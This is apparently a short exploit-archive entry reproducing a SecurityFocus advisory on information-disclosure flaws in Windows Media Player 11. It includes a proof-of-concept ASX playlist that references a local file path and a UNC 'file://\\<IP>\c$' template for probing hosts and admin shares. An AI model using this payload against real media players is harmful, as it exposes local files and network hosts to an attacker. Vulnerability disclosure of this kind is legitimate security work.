Microsoft Windows Media Player 11 - ScriptCommand Multiple Information Disclosure Vulnerabilities

source: https://www.securityfocus.com/bid/35335/info

Microsoft Windows Media Player is prone to multiple information-disclosure vulnerabilities because it fails to properly restrict access to certain functionality when handling media files.

An attacker can exploit these vulnerabilities to obtain information that may aid in further attacks. 

<ASX version="3.0">
<ENTRY>
<REF href="file://c:/test.wma"/>
</ENTRY>
</ASX>


The following command may be used to discover hosts:

file://\\<IP>\c$\a.mp3